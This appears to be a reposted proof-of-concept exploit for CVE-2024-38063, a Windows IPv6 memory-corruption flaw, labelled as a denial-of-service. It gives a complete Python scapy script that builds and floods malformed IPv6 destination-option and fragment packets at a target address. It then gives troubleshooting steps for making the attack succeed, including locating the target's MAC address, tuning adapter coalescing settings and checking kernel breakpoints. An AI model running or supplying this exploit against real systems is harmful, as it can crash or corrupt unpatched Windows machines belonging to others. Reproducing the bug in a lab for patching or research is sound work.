~avz

Encontrado por Wei

DoS

https://github.com/ynwarcs/CVE-2024-38063

from scapy.all import *

iface=''
ip_addr=''
mac_addr=''
num_tries=20
num_batches=20

def get_packets_with_mac(i):
    frag_id = 0xdebac1e + i
    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]

def get_packets(i):
    if mac_addr != '':
        return get_packets_with_mac(i)
    frag_id = 0xdebac1e + i
    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'
    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)
    return [first, second, third]

final_ps = []
for _ in range(num_batches):
    for i in range(num_tries):
        final_ps += get_packets(i) + get_packets(i)

print("Sending packets")
if mac_addr != '':
    sendp(final_ps, iface)
else:
    send(final_ps, iface)

for i in range(60):
    print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
    time.sleep(1)
print("")

Troubleshooting

If it's not working, it could be because:

• The target system can't be reached via IPv6:
  • Disable windows firewall
  • ping -6 {ipv6_address} from the host pc
  • Make sure you're getting a response
  • Re-enable the firewall
• The target system is not receiving packets
  • Install wireshark on the target system and check that packets sent by the script are arriving
• scapy is reporting "Mac address to reach destination not found. Using broadcast."
  • You need to find the mac address of the target machine
  • This can be done by running the ping command from above and checking the reply in wireshark (eth source address field)
  • You could also use scapy: Ether(raw(sr1(IPv6(dst={your_dest_ip})/ICMPv6EchoRequest()))).src, but this doesn't work sometimes
  • Once you have the mac address, put it in the mac_addr field in the script and run the script
• Packets are not being coalesced on the target system
  • Depending on your adapter network adapter / driver, it may be hard to get windows to coalesce packets without resorting to something like flooding the target akin to a ddos.
  • You can try to modify your adapter settings, e.g. "Packet Coalescing", "Interrupt Moderation", "Interrupt Moderation Mode", "Recv Segment Coalescing", depending on which ones are available. For example, setting "Interrupt Moderation Mode" to "Extreme" on my dedicated server makes the vulnerability reproducible.
• If all else fails, you can attach a kernel debugger and check a few things:
  • Is tcpip!Ipv6pReceiveDestinationOptions -> tcpip!Ipv6pProcessOptions -> tcpip!IppSendErrorList being hit?
  • Break on tcpip!Ipv6pProcessOptions and check whether [rcx] is zero all of the time. If yes, then packets are not being coalesced for some reason.
  • Break on tcpip!Ipv6pReceiveFragment and check if [rcx+0x30] is equal to zero. If not, then the vulnerability failed to be triggered for some reaso